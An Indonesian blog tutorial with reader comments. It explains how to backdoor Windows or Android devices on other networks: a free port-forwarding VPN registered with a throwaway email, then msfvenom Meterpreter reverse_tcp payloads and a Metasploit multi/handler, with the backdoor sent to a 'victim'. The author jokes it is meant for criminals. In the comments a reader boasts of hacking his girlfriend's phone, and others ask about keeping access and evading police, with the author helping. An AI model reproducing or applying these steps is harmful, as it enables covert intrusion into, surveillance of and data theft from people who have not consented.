Hack Windows atau Android Beda Jaringan Dengan Metasploit

Hack Windows atau Android Beda Jaringan Dengan Metasploit



Jika sebelumnya saya bahas hack windows  dengan metasploit masih dalam ruang lingkup lokal atau terbatas, tapi kali ini saya akan share tutorial bagaimana Hack Windows atau Android Beda Jaringan Dengan Metasploit yg hanya bermodalkan vpn gratisan dari ipjetable.

Saya buat tutorial ini karena banyak yg menginginkan tutorial ini, karena cukup bermodalkan vpn gratisan saja terutama di grup Kali Linux Indonesia :). Oke langsung saja kita mulai bahas tutorialnya.

Baca juga : 
 Pertama, kita harus menginstall kebutuhan pada desktop kita terlebih dahulu, yaitu vpn nya atau pptp nya dengan mengetikkan perintah berikut diterminal :

apt-get install network-manager-openvpn-gnome
apt-get install network-manager-pptp
apt-get install network-manager-pptp-gnome
apt-get install network-manager-strongswan
apt-get install network-manager-vpnc
apt-get install network-manager-vpnc-gnome
/etc/init.d/network-manager restart

 Setelah menginstall semua kebutuhan untuk exploit ini,
Selanjutnya masuk dulu ke web mytemp.email, bisa klik ===> Disini
Web mytemp.email biasanya digunakan untuk pembuatan email secara instan yg digunakan untuk verifikasi web yg kurang terpercaya.

Setelah masuk web mytemp.email, tinggal klik saja "Start Here", lalu secara otomatis kita sudah mempunyai email instan yg akan kita gunakan pada step berikutnya dibagian daftar di ipjetable.
Atau kita bisa tambah email lagi dengan klik tombol "New Email".

Kemudian kita buka web ipjetablenya untuk mendapatkan vpn yg support port forward yg gratisan :D, oke bisa dibuka dilink berikut ===> Register Ipjetable.net

 Setelah masuk web ipjetable, buka web mytemp.email tadi, lalu copykan email yg sudah jadi di web tersebut, misal [email protected], lalu copykan ke kolom register email di ipjetable, lalu isi captcha yg dibagian bawah kolom pengisian email tadi, dan biarkan kosong kolom yg dibawahnya lagi yg bertuliskan 16 letters, lalu klik tombol yg kuning "S'inscrire".

Jika sudah mengklik tombol kuning dan muncul tulisan berwarna hijau yg ada tulisan Merci !, berarti register berhasil, lalu cek email kita di mytemp.email tadi, lalu buka pesan dari ipjetablenya dan jangan klik link dari ipjetable dulu.

Jika sudah membuka email dari ipjetable tadi, copy link yg dikirimkan oleh ipjetable tadi dengan cara tekan klik kanan dibagian linknya, lalu pilih copy link location, lalu buka web ini free-proxy.xyz ===> free-proxy.xyz , lalu pastekan link yg diberikan tadi, lalu hapus link yg dipastekan tadi, misal setelah dipastekan jadinya seperti ini : https://xww.ro/?http://ipjetable.net/api/scr.php?af=0&code=MTQ4NDkwODM3NTp0dHF2QHNpbGl3YW5naS5nYTp0Zmk4MjI4OTg6M3poNDEzMTl6YTo4NjY1NzZhNTkzNDU1YzdjYzRmM2Y5NDhhY2UxZWI2Zg

Maka hapus bagian "https://xww.ro/?" menjadi seperti ini : http://ipjetable.net/api/scr.php?af=0&code=MTQ4NDkwODM3NTp0dHF2QHNpbGl3YW5naS5nYTp0Zmk4MjI4OTg6M3poNDEzMTl6YTo4NjY1NzZhNTkzNDU1YzdjYzRmM2Y5NDhhY2UxZWI2Zg

lalu klik unblock.

Maka kita akan diarahkan ke web ipjetable, disana kita masukkan username dan password sesuai dengan email yg kita terima tadi di mytemp, tinggal copy-paste saja lalu klik connexion, jika sudah konek, tinggal kita hubungkan vpn kita di pc kita dengan meng-klik pilihan diujung kanan atas desktop kita lalu pilih vpn, dan klik vpn setting, lalu akan muncul pengaturan networknya, kita klik icon "+" yg ada dibagian kiri bawah.

1. pilih vpn > Point to point tunneling protocol (PPTP).
2. bisa diberi nama bebas, gateway diisi dengan pptp.ipjetable.com
3. username diisi sesuai dengan yg diterima di email kita
4. password pun sama, diisi sesuai yg diterima di email.
5. lalu klik tombol "Advanced" dan ceklis bagian "use point-to-point encryption"
6. kemudian klik OK dan klik save.


Kemudian konekan lah pc kita ke vpn yg telah dibuat tadi, jika gagal konek, coba sekali lagi konek-an.

Jika sudah terhubung, langsung cek ip+port kita dengan membuka web ini : http://www.canyouseeme.org/

Lalu ip publik kita akan terlihat, nah disana kan ada kolom port, jika kita ingin exploit beda jaringan, kita harus membuka akses port kita. langkahnya :

1. silahkan masukkan port ke kolom port website tadi, masukkanlah port yg akan kita jadikan backdoor pada korban, misal 5555, seperti berikut :
2. Jika sudah memasukkan portnya untuk dicek, klik check port, lalu akan muncul tulisan yg menerangkan bahwa port kita sudah forward atau belum, jika belum akan muncul pesan "Error: I could not see your service on IPPUBLIKKITA on port (5555)",

3. Jika sudah forward, maka akan muncul pesan "Success: I can see your service on IPPUBLIKKITA on port (5555)
Your ISP is not blocking port 5555

4. Untuk mengatasi yg belum forward, pertama masukkan dulu port yg akan kita gunakan, lalu klik check port, nah akan muncul pesan error, misal kita gunakkan port 5555, lalu buka terminal kalian lalu ketikkan perintah berikut :
nc -vlp 5555
Jika sudah mengetikkan perintah tersebut diterminal, lalu coba check port kalian lagi di web tadi, maka pesan error pun akan menjadi sukses, nah tinggal kita buat backdoornya, seperti berikut :

masuk dulu terminal dan ketikkan :

Ini Untuk Windows
msfvenom -p windows/meterpreter/reverse_tcp lhost=ippublikkalian lport=portygtadikitacheck R > namafile.exe

Ini Untuk Android
msfvenom -p android/meterpreter/reverse_tcp lhost=ippublikkalian lport=portygtadikitacheck R > namafile.apk

Setelah membuat backdoor, ketik perintah ini :
msfconsole
Tunggu beberapa saat, lalu setelah masuk msfconsole, ketikkan beberapa perintah berikut :
use multi/handler
Tekan enter, trus untuk windows ketik :
 set payload windows/meterpreter/reverse_tcp

Untuk Android ketik :
set payload android/meterpreter/reverse_tcp

Setelah itu masukkan lhost kita :
set lhost IPPUBLIKSENDIRI

Lalu masukkan lport kita :
set lport PORTYGBERHASILFORWARD

Kemudian tinggal kita exploit :
exploit

Selama proses exploit, kirimkanlah backdoor yg sudah dibuat tadi, dan buka backdoor tersebut, jika android harus kita install terlebih dahulu. Jika sudah dibuka, maka sesi meterpreter-pun terbuka, tinggal kita oprek2 deh tuh korban :D.

 Untuk videonya, bisa dibuka di link ini ===> https://youtu.be/Tjm85cZZ56U



Sekian saja tutor Hack Windows atau Android Beda jaringan dengan metasploit.
Ingat, tutorial ini hanya untuk kriminal saja, ehh pembelajaran saja :v,
sorry kalo kurang jelas, jika ada yg kurang paham, tinggal tanya lewat post komentar :)

Terima Kasih, salam Maxter

89 تعليقات

Komentar Spam Akan kami Hapus

  1. Karena kalo berbayar .. itu mahal

    ردحذف
  2. mas kok di lepi ane install vpn ataugak pptpnya pasti ada bacaan E: Package 'appnya' has no installation candidate terus? solusinya om baru baru ini make kali

    ردحذف
    الردود
    1. Fix repositorynya dulu mas, di blog ini ada kok cara fix repositorinya

      حذف
    2. mas bagi reponya dong hehe, soalnya kalau gua pakai repo rolling sama sana pasti bakalan error, ini gua pakai repo moto baru stabil, gua pakai Linux kali 3.14-kali1-amd64 #1 SMP Debian 3.14.5-1kali1 (2014-06-07) x86_64 GNU/Linux

      حذف
  3. kalau pake virtualbox tidak bisa ya ?

    ردحذف
    الردود
    1. Bantu jawab ya, kalo mau pake virtual usahakan pake vm ware mas dan modenya brigded bukan nat. Itu berdasar dari pengalaman aja sih

      حذف
    2. bisa pake virtual box juga, paling pake internet via kabal LAN, yg terpenting ada Interntetnya mas, thx buat mas "Anonymous" udah bantu jawab

      حذف
  4. mas, kok saya ga konek-konek ke pvn nya ya ? fail mulu mas, mohon pencerahannya

    ردحذف
    الردود
    1. mas bisa langsung pm saya aja di facebook "Max Teroit" atau ini https://www.facebook.com/abie.siwanieun , biar cepat dibantu masalahnya

      حذف
  5. Cara dapet ip public nya gmna ?

    ردحذف
  6. kurang paham ane gan��
    ane gak tau bahasa mesin

    ردحذف
  7. ente adalah anak meme yang hoki bisa paham komputer :v

    ردحذف
  8. gan kenapa saat ane akses vpnnya, malah dimintai pasword untuk connect

    ردحذف
  9. apakah hanya untuk sesaat,maksudnya ketika kita buka lain waktu apakah android yang kita hack masih konek,dan kalau masih konek gimana perintah untuk membuka android tersebut

    ردحذف
    الردود
    1. karna ini pake vpn, otomatis ip publik akan berganti-ganti, sedangkan backdoor yg kita tanam kan sudah diset ip publiknya.
      jika masih terhubung, kita bisa lihat sesi yg terbuka dengan mengetik perintah "session -l" (tanpa tanda petik) didalam msfconsolenya

      حذف
  10. ini bisa untuk android yg pake data seluler gk? :D

    ردحذف
    الردود
    1. gan maksud di hack itu kita akses data nya atau remote ke android nya?

      حذف
    2. dengan meremote, kita juga memiliki kemungkinan buat mengakses datanya :D

      حذف
  11. Gan kenapa waktu saya ketik apt-get install yg itu keluarnya no installation gitu gam

    ردحذف
    الردود
    1. itu bisa jadi karena repository nya yg belum bener gan, coba buka link ini untuk fix repositorinya gan http://www.maxteroit.com/2017/01/fix-repository-kali-linux-unable-to-locate.html

      حذف
  12. gan konek ke vpn gagal mulu udh di ulang2 tetep gagal

    ردحذف
    الردود
    1. pm saya langsung di fb, nama fb saya Max Teroit, tv-an aj biar enak

      حذف
  13. الردود
    1. entenya aj yg kaga bisa, mungkin ada sesuatu yg salah, jgn pake dobel vpn,buktinya banyak yg work

      حذف
  14. gan, ini buat sekali pake apa berkali2 ?

    ردحذف
  15. mantapp gan. terimakasih. on process

    ردحذف
  16. terimakasih tutornya sudah saya coba dan work 100% , akhirnya saya bisa ngehack hp pacar saya wkwkwkwkw

    ردحذف
  17. gagal di connect vpn mulu bang :(

    ردحذف
  18. gan cara aktifin vpn nya gimana ?

    ردحذف
    الردود
    1. tinggal klik on nya bang, ada di kanan ujung katas,

      حذف
  19. gan gagal connect vpn mulu nih, pas hari pertama baik" aja tuh vpn nya, pas sekitar semingguan gak bisa connect tuh vpn.
    tolong pencerahan nya gan!!

    ردحذف
  20. gan ini vpn nya aktif berapa hari? apakah ada penyedia vpn yang jangka aktifnya lama? saya sudah berhasil tapi kok keterangan email dari ipjetable kok cuma 2 hari, apakah sesi meterpreternya juga hanya 2 hari saja? Terima kasih.

    ردحذف
    الردود
    1. iyha gan 2 hari, kalo yg free yg ada paling 3 hari, kalo gk salah namanya ibvpn gan,

      حذف
    2. oh gtu gan thanks pencerahan nya!

      حذف
  21. berarti sesi meterpreternya 2 hari juga berlakunya? terus kalo pake ip public asli nggak pake vpn akibatnya apa?

    ردحذف
  22. gan ini untuk exploitasi android androidnya harus instal exploitnya itu dulu ya gan ? apa langsung ke msfconsole dulu ?

    ردحذف
    الردود
    1. enaknya sih ke msfconsole dulu gan, biar terlihat action dari si korbannya :)

      حذف
  23. mas saya kok gk bisa ya waktu ngesave auto eth0 di interfaces nya, tulisannya permission denied

    ردحذف
  24. makasih bang tutor nya berhasil :)

    ردحذف
  25. Bang... kok gagal konek ke vpnya terus ya? Bisa tolong kasih pencerahannya

    ردحذف
    الردود
    1. jgn double vpn, coba pake internet/provider lain, coba trus on kan sampe on, kalo masih belum bisa, bisa kontak saya langsung bang :) , TV-an

      حذف
  26. Gimana cara install pptp di vps yg support exploit port 4444 atau open all port

    ردحذف
  27. Pake ovpn bisa gk gan??

    ردحذف
  28. الردود
    1. iyha bang, kalo diwindows paling pake pentestbox atau virtual machine misal virtual box atau vm ware

      حذف
  29. vpnnya cuma skali pakai ya? habis disconnect trus konek lagi ipnya ganti?

    ردحذف
  30. Mas itu satu komputer doang ya mas ?
    saya coba akses 2 komputer kok nggak bisa

    ردحذف
  31. Min, itu kalau kita sudah buat backdoor (mis. LHOST 15.268.10.12) dan sudah brhasil masuk ke perangkatnya.. kalau kita sudah shutdown, dan ingin akses kmbali backdoor nya, dan dapat ip baru (mis. 122.167.98.11). Apa kita set LHOST dengan ip saat buat backdoor atau set LHOST dengan ip yang baru ? Mohon pencerahannya

    ردحذف
  32. makasih gan ane bisa, tutorialnya keren

    tapi ada gak gan vpn yg ip nya static tapi gratis hehehhe

    ردحذف
  33. jadi gini, pas bagian set lhost
    itu masukin ip local atau ip publik

    ردحذف
    الردود
    1. karna ini beda jaringan jadi set lhostnya diisi ip publik

      حذف
  34. Gan.. kalo vpn nya di ganti sama ssh kira2 bisa gak? Mohon di jawab yah

    ردحذف
  35. saya udah coba kok nggak bisa connect ya gan...

    ردحذف
  36. Gan kalo exploit pake router gimana caranya?

    ردحذف
  37. Kalo buatnya pakai pd windows bisa nggak???

    ردحذف
  38. Gan, saat saya instal openvpn-gnome kok muncul tulisan 'Aurelien Jarno ' padahal repo nya udah di ubah seperti yang ada di blog ..
    Mohon bantuannya gan ..

    ردحذف
  39. gan bantuin dong caranya aktifkan metasploit ,sy kebingungan nih mohon bantuannya

    ردحذف
  40. GAN,kalo di lacak bisa nggak ame polisi jika kita bajak?apakah software ini aman melindungi perangkat kita atau hanya sekedar untuk kepentingan lain, gan mohon pencerahannya ,maaf jika ada tutur kata yang kurang berkenan dihati .....

    ردحذف
  41. mas kasih tutor dong buat yang pake kali linux nethunter di android nih beda tampilannya

    ردحذف
  42. thanks gan I am Begin And word

    ردحذف
  43. mas makasih tutorialnya tapi saya mau tanya mas..., apa kita harus connectkan VPN nya kalo mau buka metasploit dan apa konfigurasinya akan tetap setiap kali buka atau harus setting lagi dari awal...? dan kalo pake jaringan wireless apa settingan interfacenya ke auto wlan0 ?

    ردحذف
  44. bisa beda jaringan ? contohnya kita di linux make wifi dan target make data seluler.

    ردحذف
  45. sya udah nyoba mas, tpi dia ngk berhasil ngebuka meterpreter nya...
    dia cuman :
    [*] Sending stage (69048 bytes) to xxx.xxx.xxx.xx.
    [*] Meterpreter session 4 opened (xxx.xxx.xxx.xx:1919 -> xxx.xxx.xxx.x:38371) at 2017-12-24 23:01:56 +0800

    bagian meterpreternya ngk berhasil kebuka..

    ردحذف
    الردود
    1. Iya saya juga sama seperti ini, tolong dong admin bantu kenapa permasalah nya

      حذف
    2. gk sampe : meterpreter >
      ???
      udh nyoba ngulang mas ?

      حذف
  46. pada waktu membuat email, start here kok malah tampil halaman kosong ? mohon pencerahannya min

    ردحذف
  47. ujung kanan dekstop mksudnya apa ya??

    mksih

    ردحذف
  48. kalo hostnya pakenya domain bisa ga mas ? jadi kalopun ip publick kita ganti kan tinggal mengganti setingan domainnya

    ردحذف
  49. Pake metasploit bisa dapet korban langsung banyak ga ? Apa harus 1 / 1 ?

    ردحذف
  50. gan ko mytempnya ga bisa dibuka

    ردحذف
  51. gan gagal d vpn trs
    could not load vpn plugins
    error openingdiectory etc/networkmanager/vpn.......
    tlng bantuan ny gan..thnx

    ردحذف
  52. Kalo engga pake vpn bisa engga mas?

    ردحذف
  53. bang kalo seumpama jaringan internet saya mati,apakah backdoor nya masih bisa di panggil lg.mohon respon ya bang

    ردحذف

إرسال تعليق

Komentar Spam Akan kami Hapus

Post a Comment

أحدث أقدم